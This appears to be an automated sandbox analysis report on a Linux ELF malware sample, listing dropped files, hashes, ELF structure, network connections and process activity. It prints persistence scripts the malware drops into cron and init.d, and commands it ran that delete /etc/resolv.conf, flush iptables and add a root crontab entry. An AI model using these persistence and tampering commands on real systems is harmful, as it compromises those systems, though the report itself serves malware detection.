                                                                                                                            7Rbcfd7SY6Get hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            ptyGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            uW2ZTbN5heGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            UepSHkC2XfGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            OGQrtAf7KPGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            GUqOv3bL5dGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            NR882H5GR7Get hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            RiK1IzVe2XGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            aWZ2hz8omMGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            tQquJRZ7g7Get hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            wbpnDWBtzxGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            OqWVsqYanQGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            VMdqUErQGQGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            m-i.p-s.SakuraGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            CANONICAL-ASGBjg7QoCfLt9Get hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            6fY7B26kxlGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            XifGReFMVHGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            7AqQ8f7JW9Get hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            p67fy5fGRqGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            Akuryo.0curlGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            7Rbcfd7SY6Get hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            ptyGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            uW2ZTbN5heGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            UepSHkC2XfGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            OGQrtAf7KPGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            GUqOv3bL5dGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            NR882H5GR7Get hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            RiK1IzVe2XGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            aWZ2hz8omMGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            tQquJRZ7g7Get hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            wbpnDWBtzxGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            OqWVsqYanQGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            VMdqUErQGQGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            m-i.p-s.SakuraGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            INIT7CHjg7QoCfLt9Get hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            6fY7B26kxlGet hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            XifGReFMVHGet hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            7AqQ8f7JW9Get hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            p67fy5fGRqGet hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            Akuryo.0curlGet hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            7Rbcfd7SY6Get hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            ptyGet hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            uW2ZTbN5heGet hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            UepSHkC2XfGet hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            OGQrtAf7KPGet hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            GUqOv3bL5dGet hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            NR882H5GR7Get hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            RiK1IzVe2XGet hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            aWZ2hz8omMGet hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            tQquJRZ7g7Get hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            wbpnDWBtzxGet hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            OqWVsqYanQGet hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            VMdqUErQGQGet hashmaliciousBrowse
                                                                                                                            • 109.202.202.202
                                                                                                                            m-i.p-s.SakuraGet hashmaliciousBrowse
                                                                                                                            • 109.202.202.202

                                                                                                                            JA3 Fingerprints

                                                                                                                            No context

                                                                                                                            Dropped Files

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                            /etc/cron.hourly/cron.shBK86XsOVqXGet hashmaliciousBrowse

                                                                                                                              Created / dropped Files

                                                                                                                              /etc/cron.hourly/cron.sh
                                                                                                                              Process:/tmp/HuuyISbqrL
                                                                                                                              File Type:POSIX shell script, ASCII text executable
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):223
                                                                                                                              Entropy (8bit):4.756432444291805
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:htiy4Mrm9lVNy28XbCVP270gJdUiynrgns:RjwVNfGbWPirSR
                                                                                                                              MD5:B791B087B1795E3674A9AA765C76FC04
                                                                                                                              SHA1:B53F478234AE97F3CDBF2E7FE7EC68D687FEB7C1
                                                                                                                              SHA-256:1C1E9B69CF8021BF7CE1F60DCAA2D31C1E21ED4B6E474F3571DA81FFD5A9B69E
                                                                                                                              SHA-512:2DCC2E478C51CF8118306FD5C744AAD7147E368CBC4329DB1CC5FAC52088A7F3354079AE2B582B270495789E4FB4591538EC88BB5EA40EEC646F360BAC33BBB2
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Virustotal, Detection: 5%, Browse
                                                                                                                              • Antivirus: Metadefender, Detection: 11%, Browse
                                                                                                                              • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: BK86XsOVqX, Detection: malicious, Browse
                                                                                                                              Reputation:low
                                                                                                                              Preview: #!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/udev/udev /lib/udev/debug./lib/udev/debug.
                                                                                                                              /etc/init.d/.chinaz{1636583395
                                                                                                                              Process:/tmp/HuuyISbqrL
                                                                                                                              File Type:POSIX shell script, ASCII text executable
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):355
                                                                                                                              Entropy (8bit):5.348173954768942
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:hUtoFdU9uMw2tBjnsKheJjU5tBNZBE21YJvmNeMwh2L5tBjR1DzRIjutrBk6MzEm:6tw2tpmjctbZBEMO12L5tp7zujutrazL
                                                                                                                              MD5:6C162FA00872C8BCEB4331DCF0DFCCF8
                                                                                                                              SHA1:3AA328DA28C1D329E0A9696B06134B5B00D33D87
                                                                                                                              SHA-256:4B3729255911269128643140F4D971296C34D7B3EDE437CD2AB356E8A72CE62A
                                                                                                                              SHA-512:F669E609F5164FFA8D6D51F4C8EAA85384823060CB5265B0D213E3CEB02257445152ED517B0D7A8DFF9A1D5CF6DFC0E5DBC8CE87A2E60A0547F5ABF9EDE7D52B
                                                                                                                              Malicious:true
                                                                                                                              Yara Hits:
                                                                                                                              • Rule: CN_disclosed_20180208_lsls, Description: Detects malware from disclosed CN malware set, Source: /etc/init.d/.chinaz{1636583395, Author: Florian Roth
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              Reputation:low
                                                                                                                              Preview: #!/bin/sh.# chkconfig: 12345 90 90.# description: .chinaz{1636583395.### BEGIN INIT INFO.# Provides:...chinaz{1636583395.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:..chinaz{1636583395.### END INIT INFO.case $1 in.start)../tmp/.chinaz{1636583395..;;.stop)..;;.*)../tmp/.chinaz{1636583395..;;.esac.
                                                                                                                              /memfd:snapd-env-generator (deleted)
                                                                                                                              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                              File Type:ASCII text
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):76
                                                                                                                              Entropy (8bit):3.7627880354948586
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                                                                              MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                                                                              SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                                                                              SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                                                                              SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                                                                              Malicious:false
                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                              Preview: PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                                                                              /tmp/.chinaz{1636583395
                                                                                                                              Process:/tmp/HuuyISbqrL
                                                                                                                              File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.18, BuildID[sha1]=307edfa923d9ff7e3793ec8771ab90f5343cb21e, stripped
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1315556
                                                                                                                              Entropy (8bit):6.3900726950490805
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:8kUpotcUSzgtPLdOEG0V0JRzFB3ywyUZ1N2AhNdhBjh+hnPlVVW0Mk7t69Kx/ti8:MoKXwZOK0TFBCwy8P2AhNdhBjh+hnPlP
                                                                                                                              MD5:F29045435920698FBBE67B121E7BFE79
                                                                                                                              SHA1:22B027D1BEF58216B0D73DDB755AAC259711AA33
                                                                                                                              SHA-256:A07CD4589F01B49D0C349D73A6DA0EEC0E8C28C82B31BD637B2EE7FF612AD39B
                                                                                                                              SHA-512:F225DA6D66D4A46B91E6A56EFF35699C31D0E0789D70D31DF4E6CE93E1E5B3FDBC1D43C5F5C5EC1B099477F24750BD2E189BD9DA998174E6D9AD498D5131D3B8
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 73%
                                                                                                                              Reputation:low
                                                                                                                              Preview: .ELF........................4...........4. ...(.................................................................................D...D.............................L...........Q.td........................................GNU.............................GNU.0~.#..~7..q...4<..p...*...t...*...x...*...|...*.......*.......*.......*...U..S........[........|.....t..~........D<..X[...%p...h..........%t...h..........%x...h..........%|...h..........%....h..........%....h..........%....h.........1.^....PTRh....h0...QVh......;.................U..S.d$.=`....uS......d...............9.s...t&.....d...........d...9.r.......t...$.....1....`.....d$.[]..t&.U.......d$......Z........t .T$..D$......D$.h.....$.....4..........t........t...$..............U..WVS....u..}...E...............1..E......E....)E.)E..7..&.......O..N.]............).k..)..a.....\.......t>.C.<.v.C.<.w:...O..N.]...........).k..)..A.....\.......u...[^_].f..................'....U1..1.V.u.S.]......t.f.................

                                                                                                                              Static File Info

                                                                                                                              General

                                                                                                                              File type:ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.18, BuildID[sha1]=307edfa923d9ff7e3793ec8771ab90f5343cb21e, stripped
                                                                                                                              Entropy (8bit):6.3900726950490805
                                                                                                                              TrID:
                                                                                                                              • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                                                                              • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                                                                              File name:HuuyISbqrL
                                                                                                                              File size:1315556
                                                                                                                              MD5:f29045435920698fbbe67b121e7bfe79
                                                                                                                              SHA1:22b027d1bef58216b0d73ddb755aac259711aa33
                                                                                                                              SHA256:a07cd4589f01b49d0c349d73a6da0eec0e8c28c82b31bd637b2ee7ff612ad39b
                                                                                                                              SHA512:f225da6d66d4a46b91e6a56eff35699c31d0e0789d70d31df4e6ce93e1e5b3fdbc1d43c5f5c5ec1b099477f24750bd2e189bd9da998174e6d9ad498d5131d3b8
                                                                                                                              SSDEEP:24576:8kUpotcUSzgtPLdOEG0V0JRzFB3ywyUZ1N2AhNdhBjh+hnPlVVW0Mk7t69Kx/ti8:MoKXwZOK0TFBCwy8P2AhNdhBjh+hnPlP
                                                                                                                              File Content Preview:.ELF........................4...........4. ...(.....................................................................................D...D...............................L...........Q.td........................................GNU............................

                                                                                                                              Static ELF Info

                                                                                                                              ELF header

                                                                                                                              Class:ELF32
                                                                                                                              Data:2's complement, little endian
                                                                                                                              Version:1 (current)
                                                                                                                              Machine:Intel 80386
                                                                                                                              Version Number:0x1
                                                                                                                              Type:EXEC (Executable file)
                                                                                                                              OS/ABI:UNIX - Linux
                                                                                                                              ABI Version:0
                                                                                                                              Entry Point Address:0x80481f0
                                                                                                                              Flags:0x0
                                                                                                                              ELF Header Size:52
                                                                                                                              Program Header Offset:52
                                                                                                                              Program Header Size:32
                                                                                                                              Number of Program Headers:5
                                                                                                                              Section Header Offset:1314316
                                                                                                                              Section Header Size:40
                                                                                                                              Number of Section Headers:31
                                                                                                                              Header String Table Index:30

                                                                                                                              Sections

                                                                                                                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                                              NULL0x00x00x00x00x0000
                                                                                                                              .note.ABI-tagNOTE0x80480d40xd40x200x00x2A004
                                                                                                                              .note.gnu.build-idNOTE0x80480f40xf40x240x00x2A004
                                                                                                                              .rel.pltREL0x80481180x1180x380x80x2A054
                                                                                                                              .initPROGBITS0x80481500x1500x300x00x6AX004
                                                                                                                              .pltPROGBITS0x80481800x1800x700x00x6AX004
                                                                                                                              .textPROGBITS0x80481f00x1f00xf3bfc0x00x6AX0016
                                                                                                                              __libc_freeres_fnPROGBITS0x813bdf00xf3df00x18380x00x6AX0016
                                                                                                                              __libc_thread_freeres_fnPROGBITS0x813d6300xf56300x1fa0x00x6AX0016
                                                                                                                              .finiPROGBITS0x813d82c0xf582c0x1c0x00x6AX004
                                                                                                                              .rodataPROGBITS0x813d8600xf58600x1d5e40x00x2A0032
                                                                                                                              __libc_subfreeresPROGBITS0x815ae440x112e440x340x00x2A004
                                                                                                                              __libc_atexitPROGBITS0x815ae780x112e780x40x00x2A004
                                                                                                                              __libc_thread_subfreeresPROGBITS0x815ae7c0x112e7c0x80x00x2A004
                                                                                                                              .stapsdt.basePROGBITS0x815ae840x112e840x10x00x2A001
                                                                                                                              .eh_framePROGBITS0x815ae880x112e880x2843c0x00x2A004
                                                                                                                              .gcc_except_tablePROGBITS0x81832c40x13b2c40x40100x00x2A004
                                                                                                                              .tdataPROGBITS0x81882d40x13f2d40x140x00x403WAT004
                                                                                                                              .tbssNOBITS0x81882e80x13f2e80x380x00x403WAT004
                                                                                                                              .ctorsPROGBITS0x81882e80x13f2e80x280x00x3WA004
                                                                                                                              .dtorsPROGBITS0x81883100x13f3100xc0x00x3WA004
                                                                                                                              .jcrPROGBITS0x818831c0x13f31c0x40x00x3WA004
                                                                                                                              .data.rel.roPROGBITS0x81883200x13f3200xca00x00x3WA0032
                                                                                                                              .gotPROGBITS0x8188fc00x13ffc00xa40x40x3WA004
                                                                                                                              .got.pltPROGBITS0x81890640x1400640x280x40x3WA004
                                                                                                                              .dataPROGBITS0x81890a00x1400a00x9b40x00x3WA0032
                                                                                                                              .bssNOBITS0x8189a600x140a540xbb1c0x00x3WA0032
                                                                                                                              __libc_freeres_ptrsNOBITS0x819557c0x140a540x180x00x3WA004
                                                                                                                              .note.stapsdtNOTE0x00x140a540x23c0x00x0004
                                                                                                                              .commentPROGBITS0x00x140c900x2d0x10x30MS001
                                                                                                                              .shstrtabSTRTAB0x00x140cbd0x14e0x00x0001

                                                                                                                              Program Segments

                                                                                                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                                              LOAD0x00x80480000x80480000x13f2d40x13f2d43.56690x5R E0x1000.note.ABI-tag .note.gnu.build-id .rel.plt .init .plt .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .stapsdt.base .eh_frame .gcc_except_table
                                                                                                                              LOAD0x13f2d40x81882d40x81882d40x17800xd2c02.90200x6RW 0x1000.ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
                                                                                                                              NOTE0xd40x80480d40x80480d40x440x442.50770x4R 0x4.note.ABI-tag .note.gnu.build-id
                                                                                                                              TLS0x13f2d40x81882d40x81882d40x140x4c1.39660x4R 0x4
                                                                                                                              GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

                                                                                                                              Network Behavior

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Nov 10, 2021 22:29:57.330091000 CET42836443192.168.2.2391.189.91.43
                                                                                                                              Nov 10, 2021 22:29:58.098119020 CET4251680192.168.2.23109.202.202.202
                                                                                                                              Nov 10, 2021 22:30:12.178035021 CET43928443192.168.2.2391.189.91.42
                                                                                                                              Nov 10, 2021 22:30:24.465898991 CET42836443192.168.2.2391.189.91.43
                                                                                                                              Nov 10, 2021 22:30:28.561901093 CET4251680192.168.2.23109.202.202.202
                                                                                                                              Nov 10, 2021 22:30:53.137700081 CET43928443192.168.2.2391.189.91.42

                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Start time:22:29:55
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/tmp/HuuyISbqrL
                                                                                                                              Arguments:/tmp/HuuyISbqrL
                                                                                                                              File size:1315556 bytes
                                                                                                                              MD5 hash:f29045435920698fbbe67b121e7bfe79

                                                                                                                              General

                                                                                                                              Start time:22:29:55
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/tmp/HuuyISbqrL
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1315556 bytes
                                                                                                                              MD5 hash:f29045435920698fbbe67b121e7bfe79

                                                                                                                              General

                                                                                                                              Start time:22:29:55
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/tmp/HuuyISbqrL
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1315556 bytes
                                                                                                                              MD5 hash:f29045435920698fbbe67b121e7bfe79

                                                                                                                              General

                                                                                                                              Start time:22:29:57
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/tmp/HuuyISbqrL
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1315556 bytes
                                                                                                                              MD5 hash:f29045435920698fbbe67b121e7bfe79

                                                                                                                              General

                                                                                                                              Start time:22:29:57
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/tmp/HuuyISbqrL
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1315556 bytes
                                                                                                                              MD5 hash:f29045435920698fbbe67b121e7bfe79

                                                                                                                              General

                                                                                                                              Start time:22:29:57
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/tmp/HuuyISbqrL
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1315556 bytes
                                                                                                                              MD5 hash:f29045435920698fbbe67b121e7bfe79

                                                                                                                              General

                                                                                                                              Start time:22:29:57
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/tmp/HuuyISbqrL
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1315556 bytes
                                                                                                                              MD5 hash:f29045435920698fbbe67b121e7bfe79

                                                                                                                              General

                                                                                                                              Start time:22:29:57
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/usr/sbin/update-rc.d
                                                                                                                              Arguments:update-rc.d HuuyISbqrL remove
                                                                                                                              File size:3478464 bytes
                                                                                                                              MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                                                                              General

                                                                                                                              Start time:22:29:58
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/usr/sbin/update-rc.d
                                                                                                                              Arguments:n/a
                                                                                                                              File size:3478464 bytes
                                                                                                                              MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                                                                              General

                                                                                                                              Start time:22:29:58
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/usr/bin/systemctl
                                                                                                                              Arguments:systemctl daemon-reload
                                                                                                                              File size:996584 bytes
                                                                                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                              General

                                                                                                                              Start time:22:29:57
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/tmp/HuuyISbqrL
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1315556 bytes
                                                                                                                              MD5 hash:f29045435920698fbbe67b121e7bfe79

                                                                                                                              General

                                                                                                                              Start time:22:29:57
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/tmp/HuuyISbqrL
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1315556 bytes
                                                                                                                              MD5 hash:f29045435920698fbbe67b121e7bfe79

                                                                                                                              General

                                                                                                                              Start time:22:29:57
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/tmp/HuuyISbqrL
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1315556 bytes
                                                                                                                              MD5 hash:f29045435920698fbbe67b121e7bfe79

                                                                                                                              General

                                                                                                                              Start time:22:29:57
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/tmp/HuuyISbqrL
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1315556 bytes
                                                                                                                              MD5 hash:f29045435920698fbbe67b121e7bfe79

                                                                                                                              General

                                                                                                                              Start time:22:29:57
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/usr/sbin/update-rc.d
                                                                                                                              Arguments:update-rc.d .chinaz{1636583395 defaults
                                                                                                                              File size:3478464 bytes
                                                                                                                              MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                                                                              General

                                                                                                                              Start time:22:29:58
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/usr/sbin/update-rc.d
                                                                                                                              Arguments:n/a
                                                                                                                              File size:3478464 bytes
                                                                                                                              MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/usr/bin/systemctl
                                                                                                                              Arguments:systemctl daemon-reload
                                                                                                                              File size:996584 bytes
                                                                                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                              General

                                                                                                                              Start time:22:29:57
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/tmp/HuuyISbqrL
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1315556 bytes
                                                                                                                              MD5 hash:f29045435920698fbbe67b121e7bfe79

                                                                                                                              General

                                                                                                                              Start time:22:29:57
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/bin/sh
                                                                                                                              Arguments:sh -c "sed -i '/\\/etc\\/cron.hourly\\/cron.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/cron.sh' >> /etc/crontab"
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              General

                                                                                                                              Start time:22:29:57
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/bin/sh
                                                                                                                              Arguments:n/a
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              General

                                                                                                                              Start time:22:29:57
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/usr/bin/sed
                                                                                                                              Arguments:sed -i /\\/etc\\/cron.hourly\\/cron.sh/d /etc/crontab
                                                                                                                              File size:121288 bytes
                                                                                                                              MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                                                                              General

                                                                                                                              Start time:22:29:58
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/tmp/HuuyISbqrL
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1315556 bytes
                                                                                                                              MD5 hash:f29045435920698fbbe67b121e7bfe79

                                                                                                                              General

                                                                                                                              Start time:22:29:58
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/bin/sh
                                                                                                                              Arguments:sh -c "rm -rf /etc/resolv.conf"
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              General

                                                                                                                              Start time:22:29:58
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/bin/sh
                                                                                                                              Arguments:n/a
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              General

                                                                                                                              Start time:22:29:58
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/usr/bin/rm
                                                                                                                              Arguments:rm -rf /etc/resolv.conf
                                                                                                                              File size:72056 bytes
                                                                                                                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/tmp/HuuyISbqrL
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1315556 bytes
                                                                                                                              MD5 hash:f29045435920698fbbe67b121e7bfe79

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/bin/sh
                                                                                                                              Arguments:sh -c whoami
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/bin/sh
                                                                                                                              Arguments:n/a
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/usr/bin/whoami
                                                                                                                              Arguments:whoami
                                                                                                                              File size:39256 bytes
                                                                                                                              MD5 hash:dbc1888ae50bb5d4d9a7a210d51be710

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/tmp/HuuyISbqrL
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1315556 bytes
                                                                                                                              MD5 hash:f29045435920698fbbe67b121e7bfe79

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/bin/sh
                                                                                                                              Arguments:sh -c "iptables --flush"
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/bin/sh
                                                                                                                              Arguments:n/a
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/usr/sbin/iptables
                                                                                                                              Arguments:iptables --flush
                                                                                                                              File size:99296 bytes
                                                                                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/tmp/HuuyISbqrL
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1315556 bytes
                                                                                                                              MD5 hash:f29045435920698fbbe67b121e7bfe79

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/bin/sh
                                                                                                                              Arguments:sh -c whoami
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/bin/sh
                                                                                                                              Arguments:n/a
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/usr/bin/whoami
                                                                                                                              Arguments:whoami
                                                                                                                              File size:39256 bytes
                                                                                                                              MD5 hash:dbc1888ae50bb5d4d9a7a210d51be710

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/tmp/HuuyISbqrL
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1315556 bytes
                                                                                                                              MD5 hash:f29045435920698fbbe67b121e7bfe79

                                                                                                                              General

